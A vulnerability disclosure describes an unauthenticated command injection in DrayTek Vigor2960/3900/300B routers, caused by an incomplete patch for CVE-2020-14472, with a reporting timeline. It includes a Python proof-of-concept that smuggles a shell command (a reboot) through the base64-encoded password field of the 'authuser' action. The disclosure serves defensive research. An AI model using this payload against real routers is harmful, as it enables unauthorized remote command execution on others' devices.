Abstract

An command injection vulnerability without authorization was found by us in DrayTek Vigor2960/Vigor3900/Vigor300B(version <= 1.5.1.2)

The vulnerability allows any unauthorized attacker to execute commands remotely if the sms-auth is enabled.

Cause of Vulnerability

The vulnerability is caused by the unsafe and incomplete patch for CVE-2020-14472(command injection @ authuser action) , which failed to escape some dangerous characters in formpassword.

Proof of Vulnerability

Communication with DrayTek Corp.

  • 2021/02/01, the vulnerability wad reported to DrayTek Technical Support.
  • 2021/02/05, DrayTek Technical Support fixed the vulnerability and built a beta firmware.

PoC

from sys import argv
from base64 import b64encode
import requests

data = {
    "URL": "192.168.1.1",
    "HOST": "http://192.168.1.1",
    "action": "authuser",
    "formusername": b64encode(b"admin").decode(),
    "formpassword": b64encode(b"admin'&&reboot&&echo '").decode(),
    "PHONENUMBER": argv[1]
}
header = {
    "Content-Type": "application/raw"
}
url = {
    "root": "http://192.168.1.1:80",
    "cgi": {
        "root": "/cgi-bin",
        "uri": {
            "mf": "/mainfunction.cgi",
        }
    }
}


def build_url(p1, p2=None):
    if p2:
        return url["root"] + url[p1]["root"] + url[p1]["uri"][p2]
    else:
        return url["root"] + url[p1]


session = requests.session()
session.post(build_url("cgi", "mf"), data=data, headers=header)

Founder

C0ss4ck @ ByteDance WuHengLab

H4lo @ DbappSecurity Hatlab

git link: https://gist.github.com/Cossack9989/4fc889b05fa23478ef6ce8ff67200085